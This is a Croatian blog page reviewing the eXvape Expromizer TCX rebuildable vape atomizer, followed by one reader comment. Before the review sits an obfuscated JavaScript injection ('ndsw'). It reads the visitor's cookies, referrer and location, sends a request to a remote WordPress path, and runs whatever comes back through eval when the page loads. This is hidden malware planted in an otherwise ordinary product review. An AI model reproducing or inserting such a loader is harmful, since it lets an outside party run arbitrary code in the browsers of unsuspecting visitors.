;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

eXvape Expromizer TCX- Kablovi u atomizeru

Nakon godine i pol vape-anja DL sub-ohm atomizera i “koketiranja” s rebuild atomizerima, odlučio sam i ja ući u “sektu”. Proveo sam skoro cijeli mjesec pregledavajući ponude lokalnih shopova, pronašao neke kandidate, a odluka je pala na TCX od eXvape-a. Moderan dizajn i zanimljiv način dovoda tekućine u komoru bili su dovoljni razlozi za kupnju ovog interestantnog i neobičnog atomizera. Nisam znao što očekivati od uređaja, no svejedno sam ga naručio te mi je tada jedino preostalo čekati kurirsku dostavu te da sâm učim kako slagati zavojnice.

Sadržaj pakiranja i anatomija atomizera

TCX dolazi u stiliziranoj žuto-crnoj kutijici koja je do vrha puna svim potrebnim alatom za samostalnu izradu mesh zavojnica. Kutijica sadrži atomizer, paketić s rezervnim brtvama, mali odvijač (koji je neupotrebljiv za osobu koja ima veliku ruku), rezervne mesh trakice i pamuk u shoelace izdanju. Oblik pamuka koji dolazi u paketu je namijenjen da olakša početnicima prvo iskustvo slaganja grijača i zaista pomaže, a to mogu reći pošto mi je ovo prvi rebuild atomizer.

Na vrhu imamo wide bore drip tip 810 zbog kojeg je atomizer lijepo prozračan i otvoren, dok se ispod njega nalazi prsten kojim se regulira količina zraka koja dolazi na zavojnicu. Protok je blago restriktivan, otvori na komori su pod kutem i zrak usmjereno prolazi preko zavojnice. Deck se sastoji od dvije stege za mesh (potrebno je odvrnuti 2 kruga na stegama budući da imaju oprugicu u sebi što onemogućuje da se razleti sve) i porculanskog bloka koji pritišće vatu u mesh trakicu.

Postoji posebna tehnika rezanja i pripreme vate. Vata se reže vertikalno uz rubove atomizera, zatim se začešlja prema gore da izgleda kao mašna te se zatim dio vate koji je iznad mesha odrežete. Svi ovi postupci su tu zbog načina na koji ovaj atomizer dovodi tekućinu iz spremnika do vate (za razliku od drugih RDTA, ovdje vrijedi princip “manje je više”).
Sâmo sastavljanje grijača je jednostavno i brzo kada savladate motoriku cijelog procesa (koliko vate staviti, koliko jako pridržavati mesh i slično) i nakon 2-3 sastavljanja spremni ste relativno brzo slaganje svega što vam treba.

Ulaz za punjenje nalazi se na boku i potrebno je zakretati gornji dio atomizera kako bi se otvori na šasiji poravnali s otvorom spremnika. Kada se poravnaju otvori, unutra se nalazi bijela, gotovo prozirna silikonska brtvica koja ima funkciju sprječavanja povratka tekućine van ili razlijevanja. Tu, nažalost, dolazimo i do najvećeg problema s ovim atomizerom. Ta brtvica je strašno tanka i rasparala se kroz nekoliko dana korištenja. Na svu sreću, ona nije krucijalni dio uređaja te se uređaj može koristiti i dalje u slučaju pucanja brtve uz napomenu da se pripremite na opći potop pri nadopunjavanju spremnika. Dostupna je i nova, redizajnirana verzija brtve (apsolutno u stilu Nijemaca) koja je od gume uz dostupnost na webshopu proizvođača, kao i velik broj zamjenskih dijelova koji jamče dugovječnost atomizera

Spremnik je, sa 7 ml zapremine, velik za gabarite atomizera. Upravo ta zapremina jamči nadopunjavanje tek nekoliko puta tokom dana, čak i uz chainvape-anje. Spremnik je napravljen od Pyrexa i umetnut je u metalni “kavez” time omogućujući određen stupanj otpornosti na udarce. Razina tekućine u spremniku se i dalje može brzo provjeriti budući da su ostavljena dva velika otvora na “kavezu”. Sustav dovoda tekućine je zaista neobičan: radi se o 6 čeličnih kablova koji putem kapilarnosti tekućinu iz spremnika dovode do vate. Vrlo dobro odrađuju svoj posao te ja, kao početnik u sferi rebuild atomizera, nisam niti jedan dry hit doživio. Potrebno je napomenuti kako je te kablove potrebno što manje dodirivati zato što prijenos masnoća s kože utječe na sposobnost kapilarnosti i time povećava mogućnost da okusite dry hit iz prve ruke.

Na dnu se nalazi 510 navoj kojim se atomizer spaja na mod te gravura proizvođača. Cijelo dno zauzima spremnik za tekućinu. Moram pohvaliti dobro promišljeni branding gdje se logo proizvođača ugradio u dizajn atomizera, a sâm se naziv ugravirao u šasiju i nije obojan što znači da je tu, ali ne skreće pažnju na sebe što osobno smatram vrlo elegantnim rješenjem.

Dojmovi nakon korištenja i zaključak

TCX je zaista kvalitetan i lijepo napravljen uređaj. Daje precizan i širok spektar okusa iz e-tekućine. Zbog lagane restriktivnosti znate da povlačite nešto; nije kao puko disanje, Strojna obrada je na zavidnoj razini i, zbog takvog načina izrade, atomizer je iznimno teško rastaviti prvi puta. Nakon 45 minuta (koliko mi je trebalo za rastavljanje) sam bio frustriran, no kada sam složio sve i dobro podmazao bazom, ostatak procesa ide lakše. Jednostavno ga treba “razlohati”. Slaganje grijača spada u sferu dječje igre kada se uhodate, a tuga za jednostavnosti korištenja tvorničkih grijača pada u zaborav pri prvom povlačenju pare.

Ukoliko razmišljate o prelasku na rebuild, topla preporuka za ovaj atomizer. Radit će dobro, dugo te Vam svaki dan uljepšavati omiljenim okusima.

Choose your Reaction!
  • Odlična recenzija. Znači, još jedan iznimno kvalitetan produkt Exvape-a :)
    Mene osobno su kupili Expromizerom v5, nažalost to je i jedini njihov atomizer koji trenutno posjedujem,
    no zasigurno ću nabaviti još poneki s vremenom.

Leave a Comment